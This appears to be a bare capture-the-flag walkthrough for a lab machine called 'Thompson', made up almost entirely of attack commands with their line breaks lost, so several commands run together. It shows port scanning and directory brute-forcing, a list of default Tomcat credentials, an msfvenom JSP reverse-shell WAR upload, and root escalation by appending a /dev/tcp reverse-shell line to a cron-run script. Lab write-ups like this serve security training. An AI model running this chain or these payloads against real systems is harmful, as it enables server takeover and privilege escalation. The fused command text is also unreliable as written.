Thompson
Last updated
Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u http://$VICTIM:8080 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtpassword
Password1
password1
admin
tomcat
tomcat
manager
role1
tomcat
changethis
Password1
changethis
password
password1
r00t
root
toor
tomcat
s3cret
password1
password
admin
changethisUsername: tomcat
Password: s3cretmsfvenom -p java/jsp_shell_reverse_tcp LHOST=$KALI LPORT=1337 -f war > rshell.war
nc -lvnp 1337python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgcat /etc/crontabecho 'sh -i >& /dev/tcp/10.10.165.185/1338 0>&1' >> id.shnc -lvnp 1338